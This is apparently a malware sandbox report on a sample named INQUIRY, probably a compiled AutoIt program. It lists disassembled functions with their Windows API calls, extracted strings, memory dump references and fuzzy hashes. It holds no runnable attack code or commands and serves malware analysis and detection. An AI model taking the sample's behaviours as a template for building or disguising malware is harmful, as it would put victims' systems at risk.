                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                              • String ID: 0
                                                                                              • API String ID: 1296962147-4108050209
                                                                                              • Opcode ID: a9801d3852b66d5700321fe1c19aee56fe7ca503c112cbd85378fc824fd797cb
                                                                                              • Instruction ID: 9d06f2fe0bb6ad9ab4869baa9b86531d46adc284469b3629dc421eacd7b13928
                                                                                              • Opcode Fuzzy Hash: a9801d3852b66d5700321fe1c19aee56fe7ca503c112cbd85378fc824fd797cb
                                                                                              • Instruction Fuzzy Hash: 7681AF707087119FDB10DF64C998ABBBBE8FB88724F10492EF99597291C730D901CBA2
                                                                                              Function 00A8731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00A8738F
                                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00A8739B
                                                                                              • CreateCompatibleDC.GDI32(?), ref: 00A873A7
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00A873B4
                                                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00A87408
                                                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00A87444
                                                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00A87468
                                                                                              • SelectObject.GDI32(00000006,?), ref: 00A87470
                                                                                              • DeleteObject.GDI32(?), ref: 00A87479
                                                                                              • DeleteDC.GDI32(00000006), ref: 00A87480
                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00A8748B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                              • String ID: (
                                                                                              • API String ID: 2598888154-3887548279
                                                                                              • Opcode ID: d112db065082efb1d408a21bb5637fea934a341653fbdee65b02ebc79fcec8ef
                                                                                              • Instruction ID: 126bad72f23cf775ffd3248aa633973a649333ad8c0bdda704f1598b99d3b224
                                                                                              • Opcode Fuzzy Hash: d112db065082efb1d408a21bb5637fea934a341653fbdee65b02ebc79fcec8ef
                                                                                              • Instruction Fuzzy Hash: 6A513875A04309EFCB14DFA8DC85EAEBBB9EF48310F24852AF959D7211D731A9418B50
                                                                                              Function 00A16A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A30957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00A16B0C,?,00008000), ref: 00A30973
                                                                                                • Part of subcall function 00A14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A14743,?,?,00A137AE,?), ref: 00A14770
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A16BAD
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00A16CFA
                                                                                                • Part of subcall function 00A1586D: _wcscpy.LIBCMT ref: 00A158A5
                                                                                                • Part of subcall function 00A3363D: _iswctype.LIBCMT ref: 00A33645
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                              • API String ID: 537147316-1018226102
                                                                                              • Opcode ID: 94ea8e1748675b88e9648d5b6cefaaa88041bf00924e9699f7de833f8abb03f5
                                                                                              • Instruction ID: 9b1c77492959579d9970e87b472a206e6d34530604eab6fd786c00e7f80262b6
                                                                                              • Opcode Fuzzy Hash: 94ea8e1748675b88e9648d5b6cefaaa88041bf00924e9699f7de833f8abb03f5
                                                                                              • Instruction Fuzzy Hash: C10277355083409FC724EF24DA81AAFBBE5BFD8314F14491DF49A972A2DB30D989CB52
                                                                                              Function 00A72D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A72D50
                                                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00A72DDD
                                                                                              • GetMenuItemCount.USER32(00AD5890), ref: 00A72E66
                                                                                              • DeleteMenu.USER32(00AD5890,00000005,00000000,000000F5,?,?), ref: 00A72EF6
                                                                                              • DeleteMenu.USER32(00AD5890,00000004,00000000), ref: 00A72EFE
                                                                                              • DeleteMenu.USER32(00AD5890,00000006,00000000), ref: 00A72F06
                                                                                              • DeleteMenu.USER32(00AD5890,00000003,00000000), ref: 00A72F0E
                                                                                              • GetMenuItemCount.USER32(00AD5890), ref: 00A72F16
                                                                                              • SetMenuItemInfoW.USER32(00AD5890,00000004,00000000,00000030), ref: 00A72F4C
                                                                                              • GetCursorPos.USER32(?), ref: 00A72F56
                                                                                              • SetForegroundWindow.USER32(00000000), ref: 00A72F5F
                                                                                              • TrackPopupMenuEx.USER32(00AD5890,00000000,?,00000000,00000000,00000000), ref: 00A72F72
                                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A72F7E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3993528054-0
                                                                                              • Opcode ID: 1c2ab7ea2a77a1c2baf50345328325faef3283d1d03c6e7af14fc392589b74d6
                                                                                              • Instruction ID: 647e14dc83a2251e48c2bf9fe85bc7920ce78b37f40ca826894fd2aef95ce3ca
                                                                                              • Opcode Fuzzy Hash: 1c2ab7ea2a77a1c2baf50345328325faef3283d1d03c6e7af14fc392589b74d6
                                                                                              • Instruction Fuzzy Hash: AD71B171601205BFEB219F54DC85FAABFA4FB04364F14C226F629AA1E1CBB15C60DB94
                                                                                              Function 00A677DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06
                                                                                              • _memset.LIBCMT ref: 00A6786B
                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00A678A0
                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00A678BC
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00A678D8
                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00A67902
                                                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00A6792A
                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A67935
                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A6793A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                              • API String ID: 1411258926-22481851
                                                                                              • Opcode ID: 4f80a6503245d8271cc0d4be38e7e276d63c7d9affa76f8c805f09e27f39c1fe
                                                                                              • Instruction ID: 2645bce1b91f3130f281cf99a4a9880574ee41ae52b351993eacf255da4a05b1
                                                                                              • Opcode Fuzzy Hash: 4f80a6503245d8271cc0d4be38e7e276d63c7d9affa76f8c805f09e27f39c1fe
                                                                                              • Instruction Fuzzy Hash: A7410372C1422DAACF21EBA4DD85DEEB7B8BF04310F04442AF915A3261EA309E45CB90
                                                                                              Function 00A90E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A8FDAD,?,?), ref: 00A90E31
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpper
                                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                              • API String ID: 3964851224-909552448
                                                                                              • Opcode ID: 1feb184eddb55e2e3412987242e49236698a0237336464b7bd4cc0fcf073e920
                                                                                              • Instruction ID: c23ff9fcbbcb54e93fff7503618b724c058d45d789713b3220626ac07db5d070
                                                                                              • Opcode Fuzzy Hash: 1feb184eddb55e2e3412987242e49236698a0237336464b7bd4cc0fcf073e920
                                                                                              • Instruction Fuzzy Hash: F7415C3660024A8FCF14EF10EA65EEF37A4BF11380F155458FC565B292DB319E5ACBA0
                                                                                              Function 00A6F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00A4E2A0,00000010,?,Bad directive syntax error,00A9F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00A6F7C2
                                                                                              • LoadStringW.USER32(00000000,?,00A4E2A0,00000010), ref: 00A6F7C9
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                              • _wprintf.LIBCMT ref: 00A6F7FC
                                                                                              • __swprintf.LIBCMT ref: 00A6F81E
                                                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00A6F88D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                              • API String ID: 1506413516-4153970271
                                                                                              • Opcode ID: 66ceeb1ee36c54627c629db10a4eca139ca89f0bfd1887c6b2cd06e142a97d45
                                                                                              • Instruction ID: 9261d60d302ad4d6183daa2a0b60d1a83a2d1f38182874d0bf0a8fc25560be09
                                                                                              • Opcode Fuzzy Hash: 66ceeb1ee36c54627c629db10a4eca139ca89f0bfd1887c6b2cd06e142a97d45
                                                                                              • Instruction Fuzzy Hash: 2421913290421EFFCF11EFA0CD4AEEE7779BF18300F04086AF515660A2EA319668DB51
                                                                                              Function 00A752C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06
                                                                                                • Part of subcall function 00A17924: _memmove.LIBCMT ref: 00A179AD
                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A75330
                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A75346
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A75357
                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00A75369
                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00A7537A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: SendString$_memmove
                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                              • API String ID: 2279737902-1007645807
                                                                                              • Opcode ID: 4be8385184a264a6a51f6c5c02c10d40d672f52f9a62362ce415182415975755
                                                                                              • Instruction ID: 397ce77eb56cddf7c39aa38dc9b447e57085635dbd2af99efaf26d836179bfb0
                                                                                              • Opcode Fuzzy Hash: 4be8385184a264a6a51f6c5c02c10d40d672f52f9a62362ce415182415975755
                                                                                              • Instruction Fuzzy Hash: 22118F31E5012979D720B7B1CC5AEFFBBBCFB91B80F004C2AB415A60E1EEA00D45C5A0
                                                                                              Function 00A746B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                              • String ID: 0.0.0.0
                                                                                              • API String ID: 208665112-3771769585
                                                                                              • Opcode ID: ebe4eb6897e0966756fae3a09f1be76288265f522d655e3a978da456484c43ff
                                                                                              • Instruction ID: 07056db05fbc92389c97c93e7f7a7a5fc2ff0dd8591fcbb799c0db8374b7b682
                                                                                              • Opcode Fuzzy Hash: ebe4eb6897e0966756fae3a09f1be76288265f522d655e3a978da456484c43ff
                                                                                              • Instruction Fuzzy Hash: B311E7316001146FDB24AB709C8AEDA77BCEF06711F04C1B6F449D60A1FF719D828B50
                                                                                              Function 00A74F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • timeGetTime.WINMM ref: 00A74F7A
                                                                                                • Part of subcall function 00A3049F: timeGetTime.WINMM(?,75C0B400,00A20E7B), ref: 00A304A3
                                                                                              • Sleep.KERNEL32(0000000A), ref: 00A74FA6
                                                                                              • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00A74FCA
                                                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00A74FEC
                                                                                              • SetActiveWindow.USER32 ref: 00A7500B
                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A75019
                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00A75038
                                                                                              • Sleep.KERNEL32(000000FA), ref: 00A75043
                                                                                              • IsWindow.USER32 ref: 00A7504F
                                                                                              • EndDialog.USER32(00000000), ref: 00A75060
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                              • String ID: BUTTON
                                                                                              • API String ID: 1194449130-3405671355
                                                                                              • Opcode ID: 1bc61423026924374954a944ad5996aab13eb6ab4b21ec491c9710250f808769
                                                                                              • Instruction ID: 35ef6931d5b9570e755cd66bbea0c2610bdfbf8466259525742e9d597eb3fa05
                                                                                              • Opcode Fuzzy Hash: 1bc61423026924374954a944ad5996aab13eb6ab4b21ec491c9710250f808769
                                                                                              • Instruction Fuzzy Hash: AC21CF74701604BFE710DFB0EC88A263B69EB08745F14903AF10BC11B4DF758D528661
                                                                                              Function 00A7D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
                                                                                                • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
                                                                                              • CoInitialize.OLE32(00000000), ref: 00A7D5EA
                                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A7D67D
                                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 00A7D691
                                                                                              • CoCreateInstance.OLE32(00AA2D7C,00000000,00000001,00AC8C1C,?), ref: 00A7D6DD
                                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A7D74C
                                                                                              • CoTaskMemFree.OLE32(?,?), ref: 00A7D7A4
                                                                                              • _memset.LIBCMT ref: 00A7D7E1
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00A7D81D
                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A7D840
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00A7D847
                                                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00A7D87E
                                                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 00A7D880
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                              • String ID:
                                                                                              • API String ID: 1246142700-0
                                                                                              • Opcode ID: 0b5739f03827571c56d508768acdfe4d704541a61e0bd0da4b995ef6714c6700
                                                                                              • Instruction ID: ac121697811a267e2658e2c4818b777c064d8562a288f16df0e4dae6576f96bf
                                                                                              • Opcode Fuzzy Hash: 0b5739f03827571c56d508768acdfe4d704541a61e0bd0da4b995ef6714c6700
                                                                                              • Instruction Fuzzy Hash: BFB1D975A00109AFDB04DFA4CD98DAEBBB9FF48314F148469E909EB261DB30EE45CB51
                                                                                              Function 00A6C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00A6C283
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A6C295
                                                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00A6C2F3
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00A6C2FE
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A6C310
                                                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00A6C364
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00A6C372
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A6C383
                                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00A6C3C6
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00A6C3D4
                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A6C3F1
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00A6C3FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                              • String ID:
                                                                                              • API String ID: 3096461208-0
                                                                                              • Opcode ID: 1c2b1d2e642e1b3eb2655204ac3427db80e7ca789888f783723df69b3f691cdf
                                                                                              • Instruction ID: f7d41ef104ca564018516c85943289face30cd71d67c3693963f97b3f80df5d3
                                                                                              • Opcode Fuzzy Hash: 1c2b1d2e642e1b3eb2655204ac3427db80e7ca789888f783723df69b3f691cdf
                                                                                              • Instruction Fuzzy Hash: 3C513F71B00205AFDF18CFA9DD99ABEBBBAEB88711F14812DF615D7290DB709D418B10
                                                                                              Function 00A1201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A12036,?,00000000,?,?,?,?,00A116CB,00000000,?), ref: 00A11B9A
                                                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00A120D3
                                                                                              • KillTimer.USER32(-00000001,?,?,?,?,00A116CB,00000000,?,?,00A11AE2,?,?), ref: 00A1216E
                                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 00A4BCA6
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A116CB,00000000,?,?,00A11AE2,?,?), ref: 00A4BCD7
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A116CB,00000000,?,?,00A11AE2,?,?), ref: 00A4BCEE
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A116CB,00000000,?,?,00A11AE2,?,?), ref: 00A4BD0A
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A4BD1C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
